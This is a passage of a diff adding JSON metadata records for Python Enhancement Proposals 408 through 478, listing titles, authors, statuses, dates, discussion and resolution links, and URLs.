"python_version": "3.3", + "post_history": "27-Jan-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-January/115962.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0408/" + }, + "409": { + "number": 409, + "title": "Suppressing exception context", + "authors": "Ethan Furman", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Jan-2012", + "python_version": "3.3", + "post_history": "30-Aug-2002, 01-Feb-2012, 03-Feb-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-February/116136.html", + "requires": null, + "replaces": null, + "superseded_by": "415", + "url": "https://peps.python.org/pep-0409/" + }, + "410": { + "number": 410, + "title": "Use decimal.Decimal type for timestamps", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Feb-2012", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2012-February/116837.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0410/" + }, + "411": { + "number": 411, + "title": "Provisional packages in the Python standard library", + "authors": "Alyssa Coghlan, Eli Bendersky", + "discussions_to": null, + "status": "Superseded", + "type": "Informational", + "topic": "", + "created": "10-Feb-2012", + "python_version": "3.3", + "post_history": "10-Feb-2012, 24-Mar-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0411/" + }, + "412": { + "number": 412, + "title": "Key-Sharing Dictionary", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Feb-2012", + "python_version": "3.3", + "post_history": "08-Feb-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0412/" + }, + "413": { + "number": 413, + "title": "Faster evolution of the Python Standard Library", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "24-Feb-2012", + "python_version": null, + "post_history": "24-Feb-2012, 25-Feb-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0413/" + }, + "414": { + "number": 414, + "title": "Explicit Unicode Literal for Python 3.3", + "authors": "Armin Ronacher, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Feb-2012", + "python_version": "3.3", + "post_history": "28-Feb-2012, 04-Mar-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-February/116995.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0414/" + }, + "415": { + "number": 415, + "title": "Implement context suppression with exception attributes", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Feb-2012", + "python_version": "3.3", + "post_history": "26-Feb-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119467.html", + "requires": null, + "replaces": "409", + "superseded_by": null, + "url": "https://peps.python.org/pep-0415/" + }, + "416": { + "number": 416, + "title": "Add a frozendict builtin type", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Feb-2012", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0416/" + }, + "417": { + "number": 417, + "title": "Including mock in the Standard Library", + "authors": "Michael Foord", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Mar-2012", + "python_version": "3.3", + "post_history": "12-Mar-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-March/117507.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0417/" + }, + "418": { + "number": 418, + "title": "Add monotonic time, performance counter, and process time functions", + "authors": "Cameron Simpson, Jim J. Jewett, Stephen J. Turnbull, Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Mar-2012", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0418/" + }, + "419": { + "number": 419, + "title": "Protecting cleanup statements from interruptions", + "authors": "Paul Colomiets", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "06-Apr-2012", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0419/" + }, + "420": { + "number": 420, + "title": "Implicit Namespace Packages", + "authors": "Eric V. Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Apr-2012", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119651.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0420/" + }, + "421": { + "number": 421, + "title": "Adding sys.implementation", + "authors": "Eric Snow", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Apr-2012", + "python_version": "3.3", + "post_history": "26-Apr-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119683.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0421/" + }, + "422": { + "number": 422, + "title": "Simpler customisation of class creation", + "authors": "Alyssa Coghlan, Daniel Urban", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "05-Jun-2012", + "python_version": "3.5", + "post_history": "05-Jun-2012, 10-Feb-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0422/" + }, + "423": { + "number": 423, + "title": "Naming conventions and recipes related to packaging", + "authors": "Benoit Bryon", + "discussions_to": "distutils-sig@python.org", + "status": "Deferred", + "type": "Informational", + "topic": "packaging", + "created": "24-May-2012", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0423/" + }, + "424": { + "number": 424, + "title": "A method for exposing a length hint", + "authors": "Alex Gaynor", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Jul-2012", + "python_version": "3.4", + "post_history": "`15-Jul-2012 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0424/" + }, + "425": { + "number": 425, + "title": "Compatibility Tags for Built Distributions", + "authors": "Daniel Holth", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "27-Jul-2012", + "python_version": "3.4", + "post_history": "08-Aug-2012, 18-Oct-2012, 15-Feb-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-February/124116.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0425/" + }, + "426": { + "number": 426, + "title": "Metadata for Python Software Packages 2.0", + "authors": "Alyssa Coghlan, Daniel Holth, Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Withdrawn", + "type": "Informational", + "topic": "packaging", + "created": "30-Aug-2012", + "python_version": null, + "post_history": "14-Nov-2012, 05-Feb-2013, 07-Feb-2013, 09-Feb-2013, 27-May-2013, 20-Jun-2013, 23-Jun-2013, 14-Jul-2013, 21-Dec-2013", + "resolution": null, + "requires": "440, 508, 518", + "replaces": "345", + "superseded_by": "566", + "url": "https://peps.python.org/pep-0426/" + }, + "427": { + "number": 427, + "title": "The Wheel Binary Package Format 1.0", + "authors": "Daniel Holth", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Sep-2012", + "python_version": null, + "post_history": "18-Oct-2012, 15-Feb-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-February/124103.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0427/" + }, + "428": { + "number": 428, + "title": "The pathlib module -- object-oriented filesystem paths", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jul-2012", + "python_version": "3.4", + "post_history": "`05-Oct-2012 `__", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130424.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0428/" + }, + "429": { + "number": 429, + "title": "Python 3.4 Release Schedule", + "authors": "Larry Hastings", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "17-Oct-2012", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0429/" + }, + "430": { + "number": 430, + "title": "Migrating to Python 3 as the default online documentation", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "27-Oct-2012", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0430/" + }, + "431": { + "number": 431, + "title": "Time zone support improvements", + "authors": "Lennart Regebro", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "11-Dec-2012", + "python_version": null, + "post_history": "11-Dec-2012, 28-Dec-2012, 28-Jan-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "615", + "url": "https://peps.python.org/pep-0431/" + }, + "432": { + "number": 432, + "title": "Restructuring the CPython startup sequence", + "authors": "Alyssa Coghlan, Victor Stinner, Eric Snow", + "discussions_to": "capi-sig@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "28-Dec-2012", + "python_version": null, + "post_history": "28-Dec-2012, 02-Jan-2013, 30-Mar-2019, 28-Jun-2020", + "resolution": null, + "requires": "587", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0432/" + }, + "433": { + "number": 433, + "title": "Easier suppression of file descriptor inheritance", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "10-Jan-2013", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "446", + "url": "https://peps.python.org/pep-0433/" + }, + "434": { + "number": 434, + "title": "IDLE Enhancement Exception for All Branches", + "authors": "Todd Rovito, Terry Reedy", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "16-Feb-2013", + "python_version": null, + "post_history": "16-Feb-2013, 03-Mar-2013, 21-Mar-2013, 30-Mar-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-March/125003.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0434/" + }, + "435": { + "number": 435, + "title": "Adding an Enum type to the Python standard library", + "authors": "Barry Warsaw, Eli Bendersky, Ethan Furman", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Feb-2013", + "python_version": "3.4", + "post_history": "23-Feb-2013, 02-May-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-May/126112.html", + "requires": null, + "replaces": "354", + "superseded_by": null, + "url": "https://peps.python.org/pep-0435/" + }, + "436": { + "number": 436, + "title": "The Argument Clinic DSL", + "authors": "Larry Hastings", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Feb-2013", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0436/" + }, + "437": { + "number": 437, + "title": "A DSL for specifying signatures, annotations and argument converters", + "authors": "Stefan Krah", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2013", + "python_version": "3.4", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2013-May/126117.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0437/" + }, + "438": { + "number": 438, + "title": "Transitioning to release-file hosting on PyPI", + "authors": "Holger Krekel, Carl Meyer", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Process", + "topic": "packaging", + "created": "15-Mar-2013", + "python_version": null, + "post_history": "19-May-2013", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-May/020773.html", + "requires": null, + "replaces": null, + "superseded_by": "470", + "url": "https://peps.python.org/pep-0438/" + }, + "439": { + "number": 439, + "title": "Inclusion of implicit pip bootstrap in Python installation", + "authors": "Richard Jones", + "discussions_to": "distutils-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "18-Mar-2013", + "python_version": "3.4", + "post_history": "19-Mar-2013", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-August/022527.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0439/" + }, + "440": { + "number": 440, + "title": "Version Identification and Dependency Specification", + "authors": "Alyssa Coghlan, Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "18-Mar-2013", + "python_version": null, + "post_history": "30-Mar-2013, 27-May-2013, 20-Jun-2013, 21-Dec-2013, 28-Jan-2014, 08-Aug-2014, 22-Aug-2014", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2014-August/024673.html", + "requires": null, + "replaces": "386", + "superseded_by": null, + "url": "https://peps.python.org/pep-0440/" + }, + "441": { + "number": 441, + "title": "Improving Python ZIP Application Support", + "authors": "Daniel Holth, Paul Moore", + "discussions_to": "https://mail.python.org/pipermail/python-dev/2015-February/138277.html", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Mar-2013", + "python_version": "3.5", + "post_history": "30-Mar-2013, 01-Apr-2013, 16-Feb-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138578.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0441/" + }, + "442": { + "number": 442, + "title": "Safe object finalization", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-May-2013", + "python_version": "3.4", + "post_history": "18-May-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-June/126746.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0442/" + }, + "443": { + "number": 443, + "title": "Single-dispatch generic functions", + "authors": "\u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-May-2013", + "python_version": "3.4", + "post_history": "22-May-2013, 25-May-2013, 31-May-2013", + "resolution": null, + "requires": null, + "replaces": "245, 246, 3124", + "superseded_by": null, + "url": "https://peps.python.org/pep-0443/" + }, + "444": { + "number": 444, + "title": "Python Web3 Interface", + "authors": "Chris McDonough, Armin Ronacher", + "discussions_to": "web-sig@python.org", + "status": "Deferred", + "type": "Informational", + "topic": "", + "created": "19-Jul-2010", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0444/" + }, + "445": { + "number": 445, + "title": "Add new APIs to customize Python memory allocators", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Jun-2013", + "python_version": "3.4", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2013-July/127222.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0445/" + }, + "446": { + "number": 446, + "title": "Make newly created file descriptors non-inheritable", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Aug-2013", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "433", + "superseded_by": null, + "url": "https://peps.python.org/pep-0446/" + }, + "447": { + "number": 447, + "title": "Add __getdescriptor__ method to metaclass", + "authors": "Ronald Oussoren", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "12-Jun-2013", + "python_version": null, + "post_history": "02-Jul-2013, 15-Jul-2013, 29-Jul-2013, 22-Jul-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0447/" + }, + "448": { + "number": 448, + "title": "Additional Unpacking Generalizations", + "authors": "Joshua Landau", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Jun-2013", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0448/" + }, + "449": { + "number": 449, + "title": "Removal of the PyPI Mirror Auto Discovery and Naming Scheme", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "04-Aug-2013", + "python_version": null, + "post_history": "04-Aug-2013", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-August/022518.html", + "requires": null, + "replaces": "381", + "superseded_by": null, + "url": "https://peps.python.org/pep-0449/" + }, + "450": { + "number": 450, + "title": "Adding A Statistics Module To The Standard Library", + "authors": "Steven D'Aprano", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Aug-2013", + "python_version": "3.4", + "post_history": "13-Sep-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0450/" + }, + "451": { + "number": 451, + "title": "A ModuleSpec Type for the Import System", + "authors": "Eric Snow", + "discussions_to": "import-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2013", + "python_version": "3.4", + "post_history": "08-Aug-2013, 28-Aug-2013, 18-Sep-2013, 24-Sep-2013, 04-Oct-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130104.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0451/" + }, + "452": { + "number": 452, + "title": "API for Cryptographic Hash Functions v2.0", + "authors": "A.M. Kuchling, Christian Heimes", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "15-Aug-2013", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "247", + "superseded_by": null, + "url": "https://peps.python.org/pep-0452/" + }, + "453": { + "number": 453, + "title": "Explicit bootstrapping of pip in Python installations", + "authors": "Donald Stufft, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Aug-2013", + "python_version": null, + "post_history": "30-Aug-2013, 15-Sep-2013, 18-Sep-2013, 19-Sep-2013, 23-Sep-2013, 29-Sep-2013, 13-Oct-2013, 20-Oct-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-October/129810.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0453/" + }, + "454": { + "number": 454, + "title": "Add a new tracemalloc module to trace Python memory allocations", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "03-Sep-2013", + "python_version": "3.4", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130491.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0454/" + }, + "455": { + "number": 455, + "title": "Adding a key-transforming dictionary to collections", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2013", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0455/" + }, + "456": { + "number": 456, + "title": "Secure and interchangeable hash algorithm", + "authors": "Christian Heimes", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Sep-2013", + "python_version": "3.4", + "post_history": "06-Oct-2013, 14-Nov-2013, 20-Nov-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130400.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0456/" + }, + "457": { + "number": 457, + "title": "Notation For Positional-Only Parameters", + "authors": "Larry Hastings", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "08-Oct-2013", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0457/" + }, + "458": { + "number": 458, + "title": "Secure PyPI downloads with signed repository metadata", + "authors": "Trishank Karthik Kuppusamy, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, Justin Cappos", + "discussions_to": "https://discuss.python.org/t/pep-458-secure-pypi-downloads-with-package-signing/2648", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "27-Sep-2013", + "python_version": null, + "post_history": "06-Jan-2019, 13-Nov-2019", + "resolution": "https://discuss.python.org/t/pep-458-secure-pypi-downloads-with-package-signing/2648/115", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0458/" + }, + "459": { + "number": 459, + "title": "Standard Metadata Extensions for Python Software Packages", + "authors": "Alyssa Coghlan", + "discussions_to": "distutils-sig@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "11-Nov-2013", + "python_version": null, + "post_history": "21-Dec-2013", + "resolution": null, + "requires": "426", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0459/" + }, + "460": { + "number": 460, + "title": "Add binary interpolation and formatting", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "06-Jan-2014", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0460/" + }, + "461": { + "number": 461, + "title": "Adding % formatting to bytes and bytearray", + "authors": "Ethan Furman", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jan-2014", + "python_version": "3.5", + "post_history": "14-Jan-2014, 15-Jan-2014, 17-Jan-2014, 22-Feb-2014, 25-Mar-2014, 27-Mar-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-March/133621.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0461/" + }, + "462": { + "number": 462, + "title": "Core development workflow automation for CPython", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "23-Jan-2014", + "python_version": null, + "post_history": "25-Jan-2014, 27-Jan-2014, 01-Feb-2015", + "resolution": null, + "requires": "474", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0462/" + }, + "463": { + "number": 463, + "title": "Exception-catching expressions", + "authors": "Chris Angelico", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Feb-2014", + "python_version": "3.5", + "post_history": "20-Feb-2014, 16-Feb-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-March/133118.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0463/" + }, + "464": { + "number": 464, + "title": "Removal of the PyPI Mirror Authenticity API", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "02-Mar-2014", + "python_version": null, + "post_history": "04-Mar-2014", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2014-March/024027.html", + "requires": null, + "replaces": "381", + "superseded_by": null, + "url": "https://peps.python.org/pep-0464/" + }, + "465": { + "number": 465, + "title": "A dedicated infix operator for matrix multiplication", + "authors": "Nathaniel J. Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Feb-2014", + "python_version": "3.5", + "post_history": "13-Mar-2014", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/D63NDWHPF7OC2Z455MPHOW6QLLSNQUJ5/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0465/" + }, + "466": { + "number": 466, + "title": "Network Security Enhancements for Python 2.7.x", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Mar-2014", + "python_version": "2.7.9", + "post_history": "23-Mar-2014, 24-Mar-2014, 25-Mar-2014, 26-Mar-2014, 16-Apr-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-April/134163.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0466/" + }, + "467": { + "number": 467, + "title": "Minor API improvements for binary sequences", + "authors": "Alyssa Coghlan, Ethan Furman", + "discussions_to": "https://discuss.python.org/t/42001", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "30-Mar-2014", + "python_version": "3.13", + "post_history": "30-Mar-2014, 15-Aug-2014, 16-Aug-2014, 07-Jun-2016, 01-Sep-2016, 13-Apr-2021, 03-Nov-2021, 27-Dec-2023", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0467/" + }, + "468": { + "number": 468, + "title": "Preserving the order of \\*\\*kwargs in a function.", + "authors": "Eric Snow", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Apr-2014", + "python_version": "3.6", + "post_history": "05-Apr-2014, 08-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146329.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0468/" + }, + "469": { + "number": 469, + "title": "Migration of dict iteration code to Python 3", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "18-Apr-2014", + "python_version": "3.5", + "post_history": "18-Apr-2014, 21-Apr-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0469/" + }, + "470": { + "number": 470, + "title": "Removing External Hosting Support on PyPI", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "12-May-2014", + "python_version": null, + "post_history": "14-May-2014, 05-Jun-2014, 03-Oct-2014, 13-Oct-2014, 26-Aug-2015", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2015-September/026789.html", + "requires": null, + "replaces": "438", + "superseded_by": null, + "url": "https://peps.python.org/pep-0470/" + }, + "471": { + "number": 471, + "title": "os.scandir() function -- a better and faster directory iterator", + "authors": "Ben Hoyt", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-May-2014", + "python_version": "3.5", + "post_history": "27-Jun-2014, 08-Jul-2014, 14-Jul-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0471/" + }, + "472": { + "number": 472, + "title": "Support for indexing with keyword arguments", + "authors": "Stefano Borini, Joseph Martinot-Lagarde", + "discussions_to": "python-ideas@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Jun-2014", + "python_version": "3.6", + "post_history": "02-Jul-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2019-March/156693.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0472/" + }, + "473": { + "number": 473, + "title": "Adding structured data to built-in exceptions", + "authors": "Sebastian Kreft", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Mar-2014", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2019-March/156692.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0473/" + }, + "474": { + "number": 474, + "title": "Creating forge.python.org", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "19-Jul-2014", + "python_version": null, + "post_history": "19-Jul-2014, 08-Jan-2015, 01-Feb-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0474/" + }, + "475": { + "number": 475, + "title": "Retry system calls failing with EINTR", + "authors": "Charles-Fran\u00e7ois Natali, Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Jul-2014", + "python_version": "3.5", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138018.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0475/" + }, + "476": { + "number": 476, + "title": "Enabling certificate verification by default for stdlib http clients", + "authors": "Alex Gaynor", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Aug-2014", + "python_version": "2.7.9, 3.4.3, 3.5", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2014-October/136676.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0476/" + }, + "477": { + "number": 477, + "title": "Backport ensurepip (PEP 453) to Python 2.7", + "authors": "Donald Stufft, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Aug-2014", + "python_version": null, + "post_history": "01-Sep-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-September/136238.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0477/" + }, + "478": { + "number": 478, + "title": "Python 3.5 Release Schedule", + "authors": "Larry Hastings", + 